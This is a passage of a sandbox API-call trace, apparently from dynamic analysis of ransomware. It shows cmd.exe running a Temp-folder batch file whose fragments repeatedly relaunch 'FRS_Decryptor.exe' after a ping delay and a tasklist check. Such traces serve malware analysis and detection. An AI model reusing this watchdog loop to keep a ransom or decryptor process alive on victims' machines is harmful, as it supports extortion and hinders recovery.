lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0104.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0104.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0104.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0104.560] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.560] GetFileType (hFile=0x318) returned 0x1 [0104.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0104.560] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0104.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0104.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0104.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0104.560] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.560] GetFileType (hFile=0x318) returned 0x1 [0104.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0104.560] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0104.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0104.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0104.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0104.560] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.560] GetFileType (hFile=0x318) returned 0x1 [0104.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0104.560] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0104.560] SetFilePointer (in: hFile=0x318, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0104.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0104.561] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0104.561] _get_osfhandle (_FileHandle=1) returned 0x28 [0104.561] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0104.561] _get_osfhandle (_FileHandle=0) returned 0x24 [0104.561] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0104.561] SetConsoleInputExeNameW () returned 0x1 [0104.561] GetConsoleOutputCP () returned 0x1b5 [0104.561] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0104.561] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.561] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x318 [0104.561] _open_osfhandle (_OSFileHandle=0x318, _Flags=8) returned 3 [0104.562] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.562] SetFilePointer (in: hFile=0x318, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0104.562] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0104.562] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0104.562] SetFilePointer (in: hFile=0x318, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0104.562] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0104.562] GetFileType (hFile=0x318) returned 0x1 [0104.562] _get_osfhandle (_FileHandle=3) returned 0x318 [0104.562] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0104.562] _tell (_FileHandle=3) returned 2512 [0104.562] _close (_FileHandle=3) returned 0 [0104.562] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0104.562] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0104.562] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0104.562] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0104.562] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0104.562] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0104.562] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0104.562] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0104.562] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0104.562] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0104.562] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0104.562] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0104.562] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0104.562] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0104.562] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0104.562] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0104.562] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0104.562] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0104.562] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0104.562] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0104.562] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0104.562] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0104.562] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0104.562] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0104.562] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0104.562] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0104.563] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0104.563] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0104.563] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0104.563] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0104.563] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0104.563] _wcsicmp (_String1="ping", _String2="START") returned -3 [0104.563] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0104.563] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0104.563] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0104.563] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0104.563] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0104.563] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0104.563] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0104.563] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0104.563] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0104.563] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0104.563] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0104.563] SetErrorMode (uMode=0x0) returned 0x0 [0104.563] SetErrorMode (uMode=0x1) returned 0x0 [0104.563] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0104.563] SetErrorMode (uMode=0x0) returned 0x1 [0104.563] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0104.563] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0104.563] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0104.563] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.563] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0104.563] GetLastError () returned 0x2 [0104.563] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.563] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a0b0 [0104.563] FindClose (in: hFindFile=0xd5a0b0 | out: hFindFile=0xd5a0b0) returned 1 [0104.563] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0104.564] GetLastError () returned 0x2 [0104.564] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ff0 [0104.564] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0104.564] GetFileType (hFile=0x28) returned 0x2 [0104.564] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0104.564] _dup (_FileHandle=1) returned 3 [0104.564] _close (_FileHandle=1) returned 0 [0104.564] _wcsicmp (_String1="nul", _String2="con") returned 11 [0104.564] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0104.564] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0104.564] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0104.564] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0104.564] SetErrorMode (uMode=0x0) returned 0x0 [0104.564] SetErrorMode (uMode=0x1) returned 0x0 [0104.564] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0104.564] SetErrorMode (uMode=0x0) returned 0x1 [0104.565] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0104.565] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0104.565] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0104.565] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.565] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0104.565] GetLastError () returned 0x2 [0104.565] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.565] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a0b0 [0104.565] FindClose (in: hFindFile=0xd5a0b0 | out: hFindFile=0xd5a0b0) returned 1 [0104.565] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0104.565] GetLastError () returned 0x2 [0104.565] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a030 [0104.565] FindClose (in: hFindFile=0xd5a030 | out: hFindFile=0xd5a030) returned 1 [0104.565] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0104.565] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0104.565] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0104.565] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0104.566] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0104.566] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0104.566] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x36c, hThread=0x158, dwProcessId=0x804, dwThreadId=0x260)) returned 1 [0104.569] CloseHandle (hObject=0x158) returned 1 [0104.569] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0104.569] GetEnvironmentStringsW () returned 0xd30508* [0104.569] FreeEnvironmentStringsA (penv="=") returned 1 [0104.569] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0106.638] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0106.638] CloseHandle (hObject=0x36c) returned 1 [0106.638] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0106.638] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0106.639] GetEnvironmentStringsW () returned 0xd7e510* [0106.639] FreeEnvironmentStringsA (penv="=") returned 1 [0106.639] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0106.639] GetEnvironmentStringsW () returned 0xd30508* [0106.639] FreeEnvironmentStringsA (penv="=") returned 1 [0106.639] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0106.639] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0106.639] _close (_FileHandle=3) returned 0 [0106.639] _get_osfhandle (_FileHandle=1) returned 0x28 [0106.639] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0106.639] _get_osfhandle (_FileHandle=1) returned 0x28 [0106.639] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0106.640] _get_osfhandle (_FileHandle=0) returned 0x24 [0106.640] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0106.640] SetConsoleInputExeNameW () returned 0x1 [0106.640] GetConsoleOutputCP () returned 0x1b5 [0106.640] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0106.640] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.640] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x318 [0106.640] _open_osfhandle (_OSFileHandle=0x318, _Flags=8) returned 3 [0106.640] _get_osfhandle (_FileHandle=3) returned 0x318 [0106.640] SetFilePointer (in: hFile=0x318, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0106.640] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0106.641] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0106.641] SetFilePointer (in: hFile=0x318, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0106.641] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0106.641] GetFileType (hFile=0x318) returned 0x1 [0106.641] _get_osfhandle (_FileHandle=3) returned 0x318 [0106.641] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0106.641] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0106.641] ReadFile (in: hFile=0x318, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0106.641] SetFilePointer (in: hFile=0x318, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0106.641] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0106.641] GetFileType (hFile=0x318) returned 0x1 [0106.641] _get_osfhandle (_FileHandle=3) returned 0x318 [0106.642] SetFilePointer (in: hFile=0x318, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0106.642] _tell (_FileHandle=3) returned 2627 [0106.642] _close (_FileHandle=3) returned 0 [0106.642] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0106.642] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0106.642] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0106.642] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0106.642] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0106.647] feof (_File=0x76ea4c68) returned 0 [0106.647] ferror (_File=0x76ea4c68) returned 0 [0106.647] fgets (in: _Buf=0xd818e0, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0107.099] feof (_File=0x76ea4c68) returned 0 [0107.099] ferror (_File=0x76ea4c68) returned 0 [0107.099] fgets (in: _Buf=0xd872b6, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0107.133] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0107.134] MultiByteToWideChar (in: CodePage=0x1b5, 